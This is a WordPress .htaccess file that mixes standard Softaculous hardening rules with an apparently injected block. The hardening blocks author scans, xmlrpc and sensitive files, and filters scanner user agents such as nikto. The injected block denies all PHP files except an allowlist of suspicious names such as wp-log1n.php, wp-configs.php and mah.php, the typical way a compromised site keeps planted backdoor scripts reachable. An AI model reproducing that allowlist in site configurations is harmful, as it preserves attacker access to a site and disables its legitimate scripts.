# SOFTACULOUS Block author scans
RewriteEngine On
RewriteBase /
RewriteCond %{QUERY_STRING} (author=\d+) [NC,OR]
RewriteCond %{REQUEST_URI} ^.*wp-json/wp/v2/users(?!/me) [NC]
RewriteRule .* - [F,L]
# SOFTACULOUS Block author scans End

DirectoryIndex index.php index.html
<FilesMatch '.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP7|phP|PhP|php5|suspected)$'>
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch '^(goods.php|buy.php|special.php|click.php|edit.php|pages.php|product.php|shop.php|item.php|search.php|brand.php|wp-configs.php|install.php|plugin.php|plugins.php|admin.php|index.php|wp-login.php|wp-log1n.php|about.php|defaults.php|function.php|mah.php|networks.php|options.php|amp.php|load-styles.php|load-scripts.php|themes.php|wp-admin.php|post-new.php|edit-tags.php|upload.php|media-new.php|edit-comments.php|site-editor.php|plugin-install.php|users.php|user-new.php|profile.php|tools.php|import.php|export.php|site-health.php|theme-editor.php|plugin-editor.php|options-general.php|options-writing.php|options-reading.php|options-discussion.php|options-media.php|options-permalink.php|options-privacy.php|update-core.php)$'>
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# BEGIN WordPress
# The directives (lines) between "BEGIN WordPress" and "END WordPress" are
# dynamically generated, and should only be modified via WordPress filters.
# Any changes to the directives between these markers will be overwritten.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress
# SOFTACULOUS Block xmlrpc
<files xmlrpc.php>
	Require all denied
</files>
# SOFTACULOUS Block xmlrpc End

# SOFTACULOUS Block .htaccess and .htpasswd
<FilesMatch ^(?i:\.ht.*)$>
	Require all denied
</FilesMatch>
# SOFTACULOUS Block .htaccess and .htpasswd End


# SOFTACULOUS Block directory browsing
Options -Indexes
# SOFTACULOUS Block directory browsing End

# SOFTACULOUS Block access sensitive files
<FilesMatch "^.*(((?:wp-config)\.(?:php|bak|swp))|php.ini|\.[hH][tT][aApP].*|((?:error_log|readme|license|changelog|-config|-sample)\.(?:php|md|log|txt|htm|html)))$">
	Require all denied
</FilesMatch>
# SOFTACULOUS Block access sensitive files End

# SOFTACULOUS Enable bot protection
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (?:virusbot|spambot|evilbot|acunetix|BLEXBot|domaincrawler\.com|LinkpadBot|MJ12bot/v|majestic12\.co\.uk|AhrefsBot|TwengaBot|SemrushBot|nikto|winhttp|Xenu\s+Link\s+Sleuth|Baiduspider|HTTrack|clshttp|harvest|extract|grab|miner|python-requests) [NC]
RewriteRule ^(.*)$ http://no.access/
# SOFTACULOUS Enable bot protection End